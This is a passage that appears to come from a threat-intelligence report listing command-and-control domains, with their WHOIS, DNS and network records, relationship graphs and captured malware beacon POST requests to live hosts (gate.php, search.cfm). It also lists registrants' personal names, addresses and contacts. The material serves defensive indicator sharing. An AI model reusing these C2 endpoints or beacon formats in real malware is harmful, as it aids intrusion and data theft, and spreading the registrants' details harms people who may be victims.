Creation Date: 1997-08-04T04:00:00Z 

Registrar Registration Expiration Date: 2021-08-03T04:00:00Z 

Registrar: NETWORK SOLUTIONS, LLC. 

Registrar IANA ID: 2 

Registrar Abuse Contact Email: abuse@web.com 
Registrar Abuse Contact Phone: +1.8003337680 
Reseller: 

Domain Status: clientTransferProhibited https[:]//icann.org/epp#clientTransferProh bited 
Registry Registrant ID: 

Registrant Name: The Moneypaper Inc. 

Registrant Organization: The Moneypaper Inc. 

Registrant Street: 555 THEODORE FREMD AVE STE B103 

Registrant City: RYE 

Registrant State/Province: NY 

Registrant Postal Code: 10580-1456 

Registrant Country: US 

Registrant Phone: +1.9149250022 

Registrant Phone Ext: 

Registrant Fax: +1.9149219318 
Registrant Fax Ext: 

Registrant Email: vnelson@moneypaper.com 
Registry Admin ID: 

Admin Name: Nelson, Vita 

Admin Organization: Money Paper Inc 

Admin Street: 411 THEODORE FREMD AVE 

Admin City: RYE 

Admin State/Province: NY 

Admin Postal Code: 10580-1410 
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Admin Country: US 

Admin Phone: +1.9149250022 

Admin Phone Ext: 

Admin Fax: +1.9149215745 
Admin Fax Ext: 

Admin Email: vnelson@moneypaper.com 
Registry Tech ID: 

Tech Name: Nelson, Vita 

Tech Organization: Money Paper Inc 

Tech Street: 411 THEODORE FREMD AVE 

Tech City: RYE 

Tech State/Province: NY 

Tech Postal Code: 10580-1410 

Tech Country: US 

Tech Phone: +1.9149250022 

Tech Phone Ext: 

Tech Fax: +1.9149215745 
Tech Fax Ext: 

Tech Email: vnelson@moneypaper.com 
Name Server: NS1.LNHI.NET 
Name Server: NS2.LNHI.NET 
Name Server: NS3.LNHI.NET 
DNSSEC: Unsigned 

URL of the ICANN WHOIS Data Problem Reporting System: http[:]//wdprs.internic.net/ 
»> Last update of WHOIS database: 2017-01-16T12:56:12Z «< 

Network Whois record 

Queried whois.arin.net with "n ! NET-204-12-12-32-1"... 

NetRange: 204.12.12.32 - 204.12.12.63 

CIDR: 204.12.12.32/27 

NetName: THEMONEYPAPERINC 

NetHandle: NET-204-12-12-32-1 

Parent: HOSTMYSITE (NET-204-12-0-0-1) 

NetType: Reassigned 

OriginAS: AS20021 

Customer: THE MONEYPAPER INC. (C02687180) 

RegDate: 2011-02-03 

Updated: 2011-02-03 

Ref: https[:]//whois.arin.net/rest/net/NET-204-12-12-32-1 

CustName: THE MONEYPAPER INC. 

Address: 555 THEODORE FREMD AVENUE SUITE B-103 

City: RYE 

StateProv: NY 

PostalCode: 10580 

Country: US 

RegDate: 2011-02-03 

Updated: 2011-03-19 

Ref: https[:]//whois.arin.net/rest/customer/C02687180 

OrgNOCHandle: IPADM271-ARIN 

OrgNOCName: IP Admin 

OrgNOCPhone: +1-302-731-4948 

OrgNOCEmail: ipadmin@hostmysite.com 

OrgNOCRef: https[:]//whois.arin.net/rest/poc/IPADM271-ARIN 

OrgTechHandle: IPADM271-ARIN 

OrgTechName: IP Admin 

OrgTechPhone: +1-302-731-4948 

OrgTechEmail: ipadmin@hostmysite.com 

OrgTechRef: https[:]//whois.arin.net/rest/poc/IPADM271-ARIN 

OrgAbuseHandle: ABUSE1072-ARIN 

OrgAbuseName: Abuse 

OrgAbusePhone: +1-302-731-4948 

OrgAbuseEmail: abuse@hostmysite.com 

OrgAbuseRef: https[:]//whois.arin.net/rest/poc/ABUSE1072-ARIN 

RNOCHandle: IPADM271-ARIN 

RNOCName: IP Admin 

RNOCPhone: +1-302-731-4948 

RNOCEmail: ipadmin@hostmysite.com 

RNOCRef: https[:]//whois.arin.net/rest/poc/IPADM271-ARIN 

RTechHandle: IPADM271-ARIN 

RTechName: IP Admin 

RTechPhone: +1-302-731-4948 

RTechEmail: ipadmin@hostmysite.com 
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RTechRef: https[:]//whois.arin.net/rest/poc/IPADM271-ARIN 

RAbuseHandle: IPADM271-ARIN 

RAbuseName: IP Admin 

RAbusePhone: +1-302-731-4948 

RAbuseEmail: ipadmin@hostmysite.com 

RAbuseRef: https[:]//whois.arin.net/rest/poc/IPADM271-ARIN 

DNS records 

DNS query for 40.12.12.204.in-addr.arpa returned an error from the server: NameError 
name class type data time to live 

private.directinvesting.com IN A 204.12.12.40 3600s (01:00:00) 

directinvesting.com IN SOA 

server: ns1.lnhi.net 

email: administrator@lnhi.net 

serial: 24 

refresh: 10800 

retry: 3600 

expire: 604800 

minimum ttl: 3600 

3600s (01:00:00) 


directinvesting.com IN 

NS 

ns3.lnhi.net 

3600s 

(01:00:00) 

directinvesting.com IN 

NS 

nsl .lnhi.net 

3600s 

(01:00:00) 

directinvesting.com IN 

NS 

ns2.lnhi.net 

3600s 

(01:00:00) 

directinvesting.com IN 

A 

204.12.12.41 

3600s 

(01:00:00) 

directinvesting.com IN 

MX 





preference: 10 

exchange: mail.moneypaper.com 


3600s (01:00:00) 


Relationships 



(D) private.directinvesting.com 

Characterized_By 

(W) Address lookup 

(D) private.directinvesting.com 

Connected_From 

(F) 

55058d3427ce932d8efcbe54dccf97c9a8d 1 e85c7 

(D) private.directinvesting.com 

Related_To 

67814e34f4b2b6a6b305641 (8f154) 

(H) GET /lexicon/index.c 

(D) private.directinvesting.com 

Related_To 

(H) GET /lexicon/index.c 

(D) private.directinvesting.com 

Related_To 

(H) GET /lexicon/index.c 

(D) private.directinvesting.com 

Related_To 

(1)204.12.12.40 

Description 

Identified Command and Control Location. 


cderlearn.com 



HTTP Sessions 




POST /search.cfm HTTP/1.1 

Content-Type: application/x-www-form-urlencoded 

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 
3.5.21022) 

Host: www[.]cderlearn.com 
Content-Length: 38 
Connection: Keep-Alive 
Cache-Control: no-cache 
Pragma: no-cache 

rss=a5ce5fa&pg=f8&sa=8816db73d479e8e35 

POST /search.cfm HTTP/1.1 

Content-Type: application/x-www-form-urlencoded 

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 
3.5.21022) 

Host: www[.]cderlearn.com 
Content-Length: 46 
Cache-Control: no-cache 

id=3&source=a804b4b73d479eebea&rss=53d0&ei=d3c 
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Whois 


Address lookup 

canonical name cderlearn.com. 
aliases 

addresses 209.236.67.159 
Domain Whois record 

Queried whois.internic.net with "dom cderlearn.com"... 

Domain Name: CDERLEARN.COM 
Registrar: GODADDY.COM, LLC 
Sponsoring Registrar IANA ID: 146 
Whois Server: whois.godaddy.com 
Referral URL: http[:]//www[.]godaddy.com 
Name Server: NS1.WESTSERVERS.NET 
Name Server: NS2.WESTSERVERS.NET 

Status: clientDeleteProhibited https[:]//icann.org/epp#clientDeleteProhibited 
Status: clientRenewProhibited https[:]//icann.org/epp#clientRenewProhibited 
Status: clientTransferProhibited https[:]//icann.org/epp#clientTransferProh bited 
Status: clientUpdateProhibited https[:]//icann.org/epp#clientUpdateProhibited 
Updated Date: 03-feb-2016 
Creation Date: 02-feb-2016 
Expiration Date: 02-feb-2018 

»> Last update of whois database: Mon, 16 Jan 2017 12:57:44 GMT «< 

Queried whois.godaddy.com with "cderlearn.com"... 

Domain Name: cderlearn.com 

Registry Domain ID: 1999727892_DOMAIN_COM-VRSN 

Registrar WHOIS Server: whois.godaddy.com 

Registrar URL: http[:]//www[.]godaddy.com 

Update Date: 2016-02-02T20:49:41Z 

Creation Date: 2016-02-02T20:49:41Z 

Registrar Registration Expiration Date: 2018-02-02T20:49:41Z 

Registrar: GoDaddy.com, LLC 

Registrar IANA ID: 146 

Registrar Abuse Contact Email: abuse@godaddy.com 
Registrar Abuse Contact Phone: +1.4806242505 

Domain Status: clientTransferProhibited http[:]//www[.]icann.org/epp#clientTransferProh bited 
Domain Status: clientUpdateProhibited http[:]//www[.]icann.org/epp#clientUpdateProhibited 
Domain Status: clientRenewProhibited http[:]//www[.]icann.org/epp#clientRenewProhibited 
Domain Status: clientDeleteProhibited http[:]//www[.]icann.org/epp#clientDeleteProhibited 
Registry Registrant ID: Not Available From Registry 
Registrant Name: Craig Audley 
Registrant Organization: 

Registrant Street: 1 carpenters cottages 
Registrant City: holt 
Registrant State/Province: norfolk 
Registrant Postal Code: nr256sa 
Registrant Country: UK 
Registrant Phone: +44.1263710645 
Registrant Phone Ext: 

Registrant Fax: 

Registrant Fax Ext: 

Registrant Email: craigaudley@gmail.com 
Registry Admin ID: Not Available From Registry 
Admin Name: Craig Audley 
Admin Organization: 

Admin Street: 1 carpenters cottages 

Admin City: holt 

Admin State/Province: norfolk 

Admin Postal Code: nr256sa 

Admin Country: UK 

Admin Phone: +44.1263710645 

Admin Phone Ext: 

Admin Fax: 

Admin Fax Ext: 

Admin Email: craigaudley@gmail.com 
Registry Tech ID: Not Available From Registry 
Tech Name: Craig Audley 
Tech Organization: 

Tech Street: 1 carpenters cottages 
Tech City: holt 
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Tech State/Province: norfolk 
Tech Postal Code: nr256sa 
Tech Country: UK 
Tech Phone: +44.1263710645 
Tech Phone Ext: 

Tech Fax: 

Tech Fax Ext: 

Tech Email: craigaudley@gmail.com 
Name Server: NS1.WESTSERVERS.NET 
Name Server: NS2.WESTSERVERS.NET 
DNSSEC: unsigned 

URL of the ICANN WHOIS Data Problem Reporting System: http[:]//wdprs.internic.net/ 
»> Last update of WHOIS database: 2017-01-16T12:00:00Z <« 

Network Whois record 

Queried secure.mpcustomer.com with "209.236.67.159"... 

Queried whois.arin.net with "n 209.236.67.159"... 

NetRange: 209.236.64.0 - 209.236.79.255 

CIDR: 209.236.64.0/20 

NetName: WH-NET-209-236-64-0-1 

NetHandle: NET-209-236-64-0-1 

Parent: NET209 (NET-209-0-0-0-0) 

NetType: Direct Allocation 

OriginAS: AS29854 

Organization: WestHost, Inc. (WESTHO) 

RegDate: 2010-02-25 

Updated: 2014-01-02 

Ref: https[:]//whois.arin.net/rest/net/NET-209-236-64-0-1 

OrgName: WestHost, Inc. 

Orgld: WESTHO 

Address: 517 W 100 N STE 225 

City: Providence 

StateProv: UT 

PostalCode: 84332 
Country: US 

RegDate: 2000-03-13 

Updated: 2016-09-30 

Comment: Please report abuse issues to abuse@uk2group.com 

Ref: https[:]//whois.arin.net/rest/org/WESTHO 

ReferralServer: rwhois://secure.mpcustomer.com:4321 

OrgNOCHandle: NOC12189-ARIN 

OrgNOCName: NOC 

OrgNOCPhone: +1-435-755-3433 

OrgNOCEmail: noc@uk2group.com 

OrgNOCRef: https[:]//whois.arin.net/rest/poc/NOC12189-ARIN 
OrgTechHandle: WESTH1-ARIN 
OrgTechName: WestHost Inc 
OrgTechPhone: +1-435-755-3433 
OrgTechEmail: noc@uk2group.com 

OrgTechRef: https[:]//whois.arin.net/rest/poc/WESTH1-ARIN 

OrgAbuseHandle: WESTH2-ARIN 

OrgAbuseName: WestHost Abuse 

OrgAbusePhone: +1-435-755-3433 

OrgAbuseEmail: abuse@uk2group.com 

OrgAbuseRef: https[:]//whois.arin.net/rest/poc/WESTH2-ARIN 

RTechHandle: WESTH1-ARIN 

RTechName: WestHost Inc 

RTechPhone: +1-435-755-3433 

RTechEmail: noc@uk2group.com 

RTechRef: https[:]//whois.arin.net/rest/poc/WESTH1-ARIN 
RNOCHandle: WESTH1-ARIN 
RNOCName: WestHost Inc 
RNOCPhone: +1-435-755-3433 
RNOCEmail: noc@uk2group.com 

RNOCRef: https[:]//whois.arin.net/rest/poc/WESTH1-ARIN 

RAbuseHandle: WESTH2-ARIN 

RAbuseName: WestHost Abuse 

RAbusePhone: +1-435-755-3433 

RAbuseEmail: abuse@uk2group.com 

RAbuseRef: https[:]//whois.arin.net/rest/poc/WESTH2-ARIN 

DNS records 
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name class type data time to live 
cderlearn.com IN MX 
preference: 0 

exchange: cderlearn.com 

14400s (04:00:00) 

cderlearn.com IN SOA 
server: nsl .westservers.net 

email: hostmaster@westservers.net 

serial: 2016020303 

refresh: 86400 
retry: 7200 

expire: 604800 
minimum ttl: 600 


86400s (1.00:00:00) 

cderlearn.com IN NS ns2.westservers.net 86400s (1.00:00:00) 

cderlearn.com IN NS ns1.westservers.net 86400s (1.00:00:00) 

cderlearn.com IN A 209.236.67.159 14400s (04:00:00) 

159.67.236.209.in-addr.arpa IN PTR dl-573-57.slc.westdc.net 86400s (1.00:00:00) 

67.236.209.in-addr.arpa IN SOA 

server: ns1.westdc.net 

email: hostmaster@westdc.net 

serial: 2010074157 

refresh: 28800 

retry: 7200 

expire: 604800 

minimum ttl: 600 

86400s (1.00:00:00) 


67.236.209.in-addr.arpa 

IN 

NS 

ns3.westdc.net 

86400s 

(1.00:00:00) 

67.236.209.in-addr.arpa 

IN 

NS 

nsl .westdc.net 

86400s 

(1.00:00:00) 

67.236.209.in-addr.arpa 

IN 

NS 

ns2.westdc.net 

86400s 

(1.00:00:00) 


Relationships 


(D) cderlearn.com Characterized_By (W) Address lookup 


(F) 

(D) cderlearn.com Connected_From 9acba7e5f972cdd722541a23ff314ea81ac35d5c0 

c758eb708fb6e2cc4f598a0 (ae7e3) 

(D) cderlearn.com Related_To (H) POST /search.cfm HTT 

(D) cderlearn.com Related_To (H) POST /search.cfm HTT 

(D) cderlearn.com Related_To (1)209.236.67.159 


Description 

Identified Command and Control location. 


wilcarobbe.com 

Ports 

• 80 

HTTP Sessions 

• POST/zapoy/gate.php HTTP/1.0 
Host: wilcarobbe.com 
Accept: */* 

Accept-Encoding: identity, *;q=0 
Accept-Language: en-US 
Content-Length: 196 
Content-Type: application/octet-stream 
Connection: close 
Content-Encoding: binary 

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 
3.5.21022) 

...[xXP.YG.4...d...S.qO.,..4.v.,8 ..Y.u. 

X..3S*3.S..%?.".) >... 

>V....H...;4.OGf.'L..fB.N#.v[H.b_.{..w.j5... 

Whois 

Address lookup 
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lookup failed wilcarobbe.com 

A temporary error occurred during the lookup. Trying again may succeed. 

Domain Whois record 

Queried whois.internic.net with "dom wilcarobbe.com"... 

Domain Name: WILCAROBBE.COM 
Registrar: BIZCN.COM, INC. 

Sponsoring Registrar IANA ID: 471 
Whois Server: whois.bizcn.com 
Referral URL: http[:]//www[.]bizcn.com 
Name Server: NSO.XTREMEWEB.DE 
Name Server: NS3.XTREMEWEB.DE 

Status: clientDeleteProhibited https[:]//icann.org/epp#clientDeleteProhibited 
Status: clientTransferProhibited https[:]//icann.org/epp#clientTransferProh bited 
Updated Date: 07-nov-2016 
Creation Date: 11-apr-2016 
Expiration Date: 11-apr-2017 

»> Last update of whois database: Mon, 16 Jan 2017 13:05:45 GMT «< 

Queried whois.bizcn.com with "wilcarobbe.com"... 

Domain name: wilcarobbe.com 

Registry Domain ID: 2020708223_DOMAIN_COM-VRSN 

Registrar WHOIS Server: whois.bizcn.com 

Registrar URL: http[:]//www[.]bizcn.com 

Updated Date: 2016-04-11T17:42:02Z 

Creation Date: 2016-04-11T17:42:00Z 

Registrar Registration Expiration Date: 2017-04-11T17:42:00Z 

Registrar: Bizcn.com,Inc. 

Registrar IANA ID: 471 

Registrar Abuse Contact Email: abuse@bizcn.com 
Registrar Abuse Contact Phone: +86.5922577888 
Reseller: Cnobin Technology HK Limited 

Domain Status: clientDeleteProhibited (http[:]//www[.]icann.org/epp#clientDeleteProhibited) 
Domain Status: clientTransferProhibited (http[:]//www[.]icann.org/epp#clientTransferProhibited) 
Registry Registrant ID: 

Registrant Name: Arsen Ramzanov 
Registrant Organization: NA 
Registrant Street: Zlatoustskaya str, 14 fl 2 
Registrant City: Sadovoye 
Registrant State/Province: Groznenskaya obi 
Registrant Postal Code: 366041 
Registrant Country: ru 
Registrant Phone: +7.4959795033 
Registrant Phone Ext: 

Registrant Fax: +7.4959795033 
Registrant Fax Ext: 

Registrant Email: arsen.ramzanov@yandex.ru 
Registry Admin ID: 

Admin Name: Arsen Ramzanov 

Admin Organization: NA 

Admin Street: Zlatoustskaya str, 14 fl 2 

Admin City: Sadovoye 

Admin State/Province: Groznenskaya obi 

Admin Postal Code: 366041 

Admin Country: ru 

Admin Phone: +7.4959795033 

Admin Phone Ext: 

Admin Fax: +7.4959795033 
Admin Fax Ext: 

Admin Email: arsen.ramzanov@yandex.ru 
Registry Tech ID: 

Tech Name: Arsen Ramzanov 

Tech Organization: NA 

Tech Street: Zlatoustskaya str, 14 fl 2 

Tech City: Sadovoye 

Tech State/Province: Groznenskaya obi 

Tech Postal Code: 366041 

Tech Country: ru 

Tech Phone: +7.4959795033 

Tech Phone Ext: 

Tech Fax: +7.4959795033 
Tech Fax Ext: 
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Tech Email: arsen.ramzanov@yandex.ru 
Name Server: nsO.xtremeweb.de 
Name Server: ns3.xtremeweb.de 
DNSSEC: unsignedDelegation 

URL of the ICANN WHOIS Data Problem Reporting System: http[:]//wdprs.internic.net/ 
»> Last update of WHOIS database: 2017-01-16T13:06:08Z 

Network Whois record 

Don't have an IP address for which to get a record 
DNS records 

DNS query for wilcarobbe.com returned an error from the server: ServerFailure 
No records to display 

Relationships 

(D) wilcarobbe.com Characterized_By (W) Address lookup 


(F) 

9f918fb741 e951 a 10e68ce6874b839aef5a26d604 
86db31e509f8dcaa13acec5 (617ba) 


(D) wilcarobbe.com Connected_From 


(D) wilcarobbe.com Related_To 

(D) wilcarobbe.com Related_To 


(H) POST /zapoy/gate.php 
(P) 80 


Description 

Identified Command and Control Location. 

one2shoppee.com 

Ports 

• 80 

Whois 

Address lookup 

canonical name one2shoppee.com. 
aliases 

addresses 2604:5800:0:23::8 
69.195.129.72 

Domain Whois record 

Queried whois.internic.net with "dom one2shoppee.com''... 

Domain Name: ONE2SHOPPEE.COM 
Registrar: DYNADOT, LLC 
Sponsoring Registrar IANA ID: 472 
Whois Server: whois.dynadot.com 
Referral URL: http[:]//www[.]dynadot.com 
Name Server: NS1.DYNADOT.COM 
Name Server: NS2.DYNADOT.COM 

Status: clientTransferProhibited https[:]//icann.org/epp#clientTransferProh bited 
Updated Date: 05-jan-2017 
Creation Date: 05-jan-2017 
Expiration Date: 05-jan-2018 

»> Last update of whois database: Mon, 16 Jan 2017 13:01:15 GMT «< 

Queried whois.dynadot.com with "one2shoppee.com"... 

Domain Name: ONE2SHOPPEE.COM 

Registry Domain ID: 2087544116_DOMAIN_COM-VRSN 

Registrar WHOIS Server: whois.dynadot.com 

Registrar URL: http[:]//www[.]dynadot.com 

Updated Date: 2017-01-05T10:40:34.0Z 

Creation Date: 2017-01-05T10:40:32.0Z 

Registrar Registration Expiration Date: 2018-01-05T10:40:32.0Z 

Registrar: DYNADOT LLC 

Registrar IANA ID: 472 

Registrar Abuse Contact Email: abuse@dynadot.com 
Registrar Abuse Contact Phone: +1.6502620100 
Domain Status: clientTransferProhibited 
Registry Registrant ID: 

Registrant Name: Authorized Representative 
Registrant Organization: Kleissner & Associates s.r.o. 

Registrant Street: Na strzi 1702/65 
Registrant City: Praha 
Registrant Postal Code: 140 00 
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Registrant Country: CZ 
Registrant Phone: +420.00000000 
Registrant Email: domains@vimstracker.info 
Registry Admin ID: 

Admin Name: Authorized Representative 
Admin Organization: Kleissner & Associates s.r.o. 

Admin Street: Na strzi 1702/65 

Admin City: Praha 

Admin Postal Code: 140 00 

Admin Country: CZ 

Admin Phone: +420.00000000 

Admin Email: domains@virustracker.info 

Registry Tech ID: 

Tech Name: Authorized Representative 
Tech Organization: Kleissner & Associates s.r.o. 

Tech Street: Na strzi 1702/65 

Tech City: Praha 

Tech Postal Code: 140 00 

Tech Country: CZ 

Tech Phone: +420.00000000 

Tech Email: domains@virustracker.info 

Name Server: ns1.dynadot.com 

Name Server: ns2.dynadot.com 

DNSSEC: unsigned 

URL of the ICANN WHOIS Data Problem Reporting System: http[:]//wdprs.internic.net/ 
»> Last update of WHOIS database: 2017-01-16 04:56:51 -0800 «< 

Network Whois record 

Whois query for 69.195.129.72 failed: TimedOut 
Queried whois.arin.net with "n 69.195.129.72"... 

NetRange: 69.195.128.0 - 69.195.159.255 

CIDR: 69.195.128.0/19 

NetName: JOESDC-01 

NetHandle: NET-69-195-128-0-1 

Parent: NET69 (NET-69-0-0-0-0) 

NetType: Direct Allocation 

OriginAS: AS19969 

Organization: Joe's Datacenter, LLC (JOESD) 

RegDate: 2010-07-09 

Updated: 2015-03-06 

Ref: https[:]//whois.arin.net/rest/net/NET-69-195-128-0-1 

OrgName: Joe's Datacenter, LLC 

Orgld: JOESD 

Address: 1325 Tracy Ave 

City: Kansas City 

StateProv: MO 

PostalCode: 64106 

Country: US 

RegDate: 2009-08-21 

Updated: 2014-06-28 

Ref: https[:]//whois.arin.net/rest/org/JOESD 

ReferralServer: rwhois://support.joesdatacenter.com:4321 

OrgAbuseHandle: NAA25-ARIN 

OrgAbuseName: Network Abuse Administrator 

OrgAbusePhone: +1-816-726-7615 

OrgAbuseEmail: security@joesdatacenter.com 

OrgAbuseRef: https[:]//whois.arin.net/rest/poc/NAA25-ARIN 

OrgTechHandle: JPM84-ARIN 

OrgTechName: Morgan, Joe Patrick 

OrgTechPhone: +1-816-726-7615 

OrgTech Email: joe@joesdatacenter.com 

OrgTechRef: https[:]//whois.arin.net/rest/poc/JPM84-ARIN 

OrgNOCHandle: JPM84-ARIN 

OrgNOCName: Morgan, Joe Patrick 

OrgNOCPhone: +1-816-726-7615 

OrgNOCEmail: joe@joesdatacenter.com 

OrgNOCRef: https[:]//whois.arin.net/rest/poc/JPM84-ARIN 

RAbuseHandle: NAA25-ARIN 

RAbuseName: Network Abuse Administrator 

RAbusePhone: +1-816-726-7615 

RAbuseEmail: security@joesdatacenter.com 

RAbuseRef: https[:]//whois.arin.net/rest/poc/NAA25-ARIN 
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RNOCHandle: JPM84-ARIN 


RNOCName: Morgan, Joe Patrick 

RNOCPhone: +1-816-726-7615 

RNOCEmail: joe@joesdatacenter.com 

RNOCRef: https[:]//whois.arin.net/rest/poc/JPM84-ARIN 

RTechHandle: JPM84-ARIN 

RTechName: Morgan, Joe Patrick 

RTechPhone: +1-816-726-7615 

RTechEmail: joe@joesdatacenter.com 

RTechRef: https[:]//whois.arin.net/rest/poc/JPM84-ARIN 

DNS records 

DNS query for 72.129.195.69.in-addr.arpa returned an error from the server: NameError 

DNS query for 8.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.3.2.0.0.0.0.0.0.0.0.8.5.4.0.6.2.ip6.arpa returned an error from the server: NameError 

name class type data time to live 

one2shoppee.com IN SOA 

server: nsl .dynadot.com 

email: hostmaster@one2shoppee.com 

serial: 1484571411 

refresh: 16384 

retry: 2048 

expire: 1048576 

minimum ttl: 2560 


2560s (00:42:40) 

one2shoppee.com IN NS ns1.dynadot.com 10800s 
one2shoppee.com IN NS ns2.dynadot.com 10800s 
one2shoppee.com IN AAAA 2604:5800:0:23::8 
one2shoppee.com IN A 69.195.129.72 10800s 


(03:00:00) 
(03:00:00) 
10800s (03:00:00) 

(03:00:00) 


Relationships 

(D) one2shoppee.com Characterized_By (W) Address lookup 

(F) 

(D) one2shoppee.com Connected_From 9f918fb741e951a10e68ce6874b839aef5a26d604 

86db31e509f8dcaa13acec5 (617ba) 

(D) one2shoppee.com Related_To (P) 80 


Description 

Identified Command and Control Location. 


ritsoperrol.ru 

Ports 

• 80 

HTTP Sessions 

• POST /zapoy/gate.php HTTP/1.0 
Host: ritsoperrol.ru 
Accept: */* 

Accept-Encoding: identity, *;q=0 
Accept-Language: en-US 
Content-Length: 196 
Content-Type: application/octet-stream 
Connection: close 
Content-Encoding: binary 

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 
3.5.21022) 

...[xXP.YG.4...d...S.q0....4.v.,8 ..Y.u. 

X..3S*3.S..%?.".).>... 

>V....H...;4.OGf.'L..fB.N#.v[H.b_.{..w.j5... 

Whois 

Address lookup 

lookup failed ritsoperrol.ru 

A temporary error occurred during the lookup. Trying again may succeed. 

Domain Whois record 

Queried whois.nic.ru with "ritsoperrol.ru"... 

No entries found for the selected source(s). 
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»> Last update of WHOIS database: 2017.01.16T13:04:09Z «< 

Network Whois record 

Don't have an IP address for which to get a record 
DNS records 

DNS query for ritsoperrol.ru returned an error from the server: ServerFailure 
No records to display 

Relationships 

(D) ritsoperrol.ru Characterized_By (W) Address lookup 

(F) 

(D) ritsoperrol.ru Connected_From 9f918fb741e951a10e68ce6874b839aef5a26d604 

86db31e509f8dcaa13acec5 (617ba) 

(D) ritsoperrol.ru Related_To (P) 80 

(D) ritsoperrol.ru Related_To (FI) POST /zapoy/gate.php 

Description 

Identified Command and Control Location. 

littjohnwilhap.ru 

Ports 

• 80 

HTTP Sessions 

• POST /zapoy/gate.php HTTP/1.0 
Host: littjohnwilhap.ru 
Accept: */* 

Accept-Encoding: identity, *;q=0 
Accept-Language: en-US 
Content-Length: 196 
Content-Type: application/octet-stream 
Connection: close 
Content-Encoding: binary 

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 
3.5.21022) 

...[xXP.YG.4...d...S.q0....4.v.,8 ..Y.u. 

X..3S*3.S..%?.".).>... 

>V....H...;4.OGf.'L..fB.N#.v[H.b_.{..w.j5... 

Whois 

Address lookup 

lookup failed littjohnwilhap.ru 

Could not find an IP address for this domain name. 

Domain Whois record 

Queried whois.nic.ru with "littjohnwilhap.ru"... 

No entries found for the selected source(s). 

»> Last update of WHOIS database: 2017.01.16T13:05:16Z «< 

Network Whois record 

Don't have an IP address for which to get a record 
DNS records 

DNS query for littjohnwilhap.ru returned an error from the server: NameError 
No records to display 

Relationships 

(D) littjohnwilhap.ru Characterized_By (W) Address lookup 

(F) 

(D) littjohnwilhap.ru Connected_From 9f918fb741e951a10e68ce6874b839aef5a26d604 

86db31e509f8dcaa13acec5 (617ba) 

(D) littjohnwilhap.ru Related_To (H) POST /zapoy/gate.php 

(D) littjohnwilhap.ru Related_To (P) 80 

Description 
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Identified Command and Control Location. 


insta.reduct.ru 

Ports 

• 80 

Whois 

Address lookup 

canonical name insta.reduct.ru. 
aliases 

addresses 146.185.161.126 


Domain Whois record 

Queried whois.nic.ru with "reduct.ru"... 

domain: REDUCT.RU 

nserver: ns1.spaceweb.ru 

nserver: ns2.spaceweb.ru 

state: REGISTERED, DELEGATED 

person: Private person 

admin-contact:https[:]//www[.]nic.ru/cgi/whois_webmail.cgi?domain=REDUCT.RU 

registrar: RU-CENTER-RU 

created: 2009.03.13 

paid-till: 2017.03.13 

source: RU-CENTER 

»> Last update of WHOIS database: 2017.01,16T13:00:25Z «< 


Network Whois record 

Queried whois.ripe.net with "-B 146.185.161.126"... 

% Information related to '146.185.160.0 - 146.185.167.255' 

% Abuse contact for '146.185.160.0 - 146.185.167.255' is 'abuse@digitalocean.com' 

inetnum: 146.185.160.0 - 146.185.167.255 

netname: DIGITALOCEAN-AMS-3 

descr: Digital Ocean, Inc. 

country: NL 

admin-c: PT7353-RIPE 

tech-c: PT7353-RIPE 

status: ASSIGNED PA 

mnt-by: digitalocean 

mnt-lower: digitalocean 

mnt-routes: digitalocean 

created: 2013-09-17T17:13:25Z 

last-modified: 2015-11-20T14:45:22Z 

source: RIPE 

person: Network Operations 

address: 101 Ave of the Americas, 10th Floor, New York, NY 10013 

phone: +13478756044 

nic-hdl: PT7353-RIPE 

mnt-by: digitalocean 

created: 2015-03-11T16:37:07Z 

last-modified: 2015-11 -19T15:57:21 Z 

source: RIPE 

e-mail: noc@digitalocean.com 

org: ORG-DOI2-RIPE 

% This query was served by the RIPE Database Query Service version 1.88 (WAGYU) 
DNS records 

DNS query for 126.161.185.146.in-addr.arpa returned an error from the server: NameError 
name class type data time to live 
insta.reduct.ru IN A 146.185.161.126 600s(00:10:00) 

reduct.ru IN SOA 

server: ns1.spaceweb.ru 

email: dns1@sweb.ru 

serial: 2010022878 

refresh: 28800 
retry: 7200 

expire: 604800 
minimum ttl: 600 

600s(00:10:00) 

reduct.ru IN A 77.222.42.238 600s(00:10:00) 

reduct.ru IN NS ns3.spaceweb.pro 600s(00:10:00) 

reduct.ru IN NS ns1.spaceweb.ru 600s(00:10:00) 
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NS ns2.spaceweb.ru 
NS ns4.spaceweb.pro 
MX 
10 

mxl .spaceweb.ru 


reduct.ru IN 
reduct.ru IN 
reduct.ru IN 
preference: 
exchange: 

600s(00:10:00) 
reduct.ru IN MX 
preference: 20 

exchange: mx2.spaceweb.ru 

600s(00:10:00) 


600s(00:10:00) 

600s(00:10:00) 


Relationships 

(D) insta.reduct.ru Characterized_By (W) Address lookup 

(F) 

(D) insta.reduct.ru Connected_From 9f918fb741e951a10e68ce6874b839aef5a26d604 

86db31e509f8dcaa13acec5 (617ba) 

(D) insta.reduct.ru Related_To (P) 80 

(D) insta.reduct.ru Related_To (1) 146.185.161.126 


Description 

Identified Command and Control Location. 


editprod.waterfilter.in.ua 

Ports 

• 80 

Whois 

Address lookup 

canonical name editprod.waterfilter.in.ua. 
aliases 

addresses 176.114.0.120 

Domain Whois record 

Queried whois.ua with "waterfilter.in.ua"... 

% request from 209.200.70.26 
% This is the Ukrainian Whois query server #1. 

% The Whois is subject to Terms of use 
% See https[:]//hostmaster.ua/services/ 

% 

% The object shown below is NOT in the UANIC database. 

% It has been obtained by querying a remote server: 

% (whois.in.ua) at port 43. 

% 

% REDIRECT BEGIN 
% In.UA whois server, (whois.in.ua) 

% All questions regarding this service please send to help@whois.in.ua 

% To search for domains and In.UA maintainers using the web, visit http[:]//whois.in.ua 

domain: waterfilter.in.ua 

descr: waterfilter.in.ua 

admin-c: THST-UANIC 

tech-c: THST-UANIC 

